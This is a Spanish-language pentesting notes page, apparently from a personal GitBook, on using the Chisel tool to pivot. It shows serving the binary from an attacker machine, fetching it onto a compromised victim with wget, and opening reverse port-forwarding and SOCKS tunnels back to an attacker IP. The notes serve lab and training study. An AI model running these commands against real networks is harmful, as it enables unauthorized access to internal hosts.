brain_fuck
Checklists
Checklists
  • 📁What Is It
  • 🐧Linux Hardening
    • Privilege Escalation - Linux
      • SUDO
      • Kernel Exploit
      • SUID or SGID
      • Capabilities
      • Cron Jobs
      • PATH Hijacking
      • NFS (Network File Sharing)
  • 🖼️Windows Hardening
    • Privilege Escalation - Windows
      • Abusing dangerous privileges
      • Abusing Service Misconfigurations
      • Abusing Vulnerable Software
      • Recopilación de contraseñas en sitios habituales
      • Otras escaladas
    • AD - Active Directory
      • Basic AD
      • Samba & NTML Relay
      • Pass The Hash (PTH)
      • Kerberoasting Attack
      • Golden Ticket & Pass The Ticket (PTT)
  • 🧰Tools
    • Nmap
    • John the Ripper
      • zip2john
    • Gobuster
    • Smbmap
    • Smbclient
    • WPScan
    • GitHack
    • Chisel
      • Proxychains/Sock
    • Hydra
    • Msfvenom
    • CrackMapExec
    • Psexec
    • BloondHound
    • Rpcclient
    • Ldapdomaindump
    • Evil-wmr
    • Burpsuite
    • KeyHunter
  • 📡Ports
    • 21 - FTP
    • 22 - SSH
    • 25 - SMTP
    • 53 - DNS
    • 443 - HTTPS
    • 139;445 - SMB
    • 3389 - RDP
    • 5985 - Wsman
  • 🍎Red - Bash Scripting
    • Pivoting
  • 🧙‍♂️Pentesting Methodology
    • Pivoting
      • Ligolo-ng
  • 🌐OSINT
    • Gps-Coordinates
    • GPG
    • Sherlock
    • Whatsmyname
    • Wiggle
    • Image & Geospatial Intelligence
    • FFmpeg - Geolocating Videos
  • 🗒️TO-DO
  • 🕷️HTB-CBBH
    • Web Requests - Fundamentals
      • HTTP Fundamentals
        • HyperText Transfer Protocol (HTTP)
          • Hypertext Transfer Protocol Secure (HTTPS)
        • HTTP Requests and Responses
        • HTTP Headers
      • HTTP Methods
        • HTTP Methods & Codes
        • GET
        • POST
        • CRUD API
    • Introduction to Web Applications - Fundamentals
      • Front Components & Vulns
      • Back End Components & Vulns
    • Hacking WordPress
      • Info
      • Enumeration
      • Exploitin
    • Using Web Proxies
      • Web Proxy
      • Web Fuzzer
      • Extensions
    • Information Gathering - Web Edition
      • DNS & Subdomains
    • Attacking Web Applications with Ffuf
      • Fuzzing
    • JavaScript Deobfuscation
      • Deobfuscation & Decode
    • Cross-Site Scripting (XSS)
      • XSS Basics
      • XSS Phishing
      • Blind XSS - Session Hijacking
    • SQL Injection
      • Databases & Queries
      • SQL Injections
      • Exploitation
        • Database Enumeration
        • Reading Files
        • Writing Files
      • Skill Assessment
    • SQLMap Essentials
      • Building Attacks
Powered by GitBook
On this page
  • Descarga
  • Uso
  1. Tools

Chisel

PreviousGitHackNextProxychains/Sock

Last updated 3 months ago

Descarga

Lo descargamos en nuestra maquina kali (atacante)

Recomendable v1.7.2

Opcion 1

Clonamos chisel en nuestro equipo

git clone https://github.com/jpillora/chisel
cd !$
go build -ldflags "-s -w" .

Opcion 2

Vamos a los releases y descargamos la versión que queramos (linux_amd64.gz)

Ahora solo descomprimimos

gunzip chisel_1.10.1_linux_amd64.gz && mv chisel_1.10.1_linux_amd64 chisel

Reducimos su peso

Podemos comprobar su peso con du -hc chisel antes de reducirlo

Y ahora reducimos su peso

chmod +x chisel && upx chisel

Compartir chisel - wget

Ahora me levanto como servidor web con python y me comparto (a una de las maquinas victimas (que tenga ejecucion de comandos)) con wget desde el /tmp de la maquina victima o el /dev/shm

sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ..
wget http://10.10.14.16/chisel

Compartir chisel - curl


Uso

Puerto a puerto

Me levanto un servidor con chisel (desde mi maquina kali atacante)

./chisel server --reverse -p 1234

En la maquina victima, doy permisos de ejecución chmod +x chisel a chisel y me pongo como cliente y hago el portforwarding

./chisel client IP_ATTACKER:1234 R:8080:10.10.10.128:80

El R:8080:10.10.10.128:80 dice R: el 80 (puerto de mi maquina de atacante (puede ser el que sea)), quiero que me vuelques lo tiene la ip 10.10.10.128 en su puerto 80. Así que si nos vamos a nuestro http://localhost;8080 deberíamos ver el contenido de 10.10.10.128 haciendo un tuneling a través de la 192.168.18.213 (MAGIA)

A veces es necesario utilizar "releases" del git de chisel mas antiguos (según la maquina)

Con Sock

Me levanto un servidor con chisel (desde mi maquina kali atacante)

./chisel server --reverse -p 1234

En la maquina victima, doy permisos de ejecución chmod +x chisel a chisel y me pongo como cliente y le meto el sock

./chisel client 192.168.18.215:1234 R:socks

A la hora de lanzar comandos, hay que poner primero proxychains

EJ: proxychains nmap --top-ports 1000 -sT --open -T5 -v -n -Pn 10.10.10.128 2>&1 | grep -vE "timeout|OK"

🧰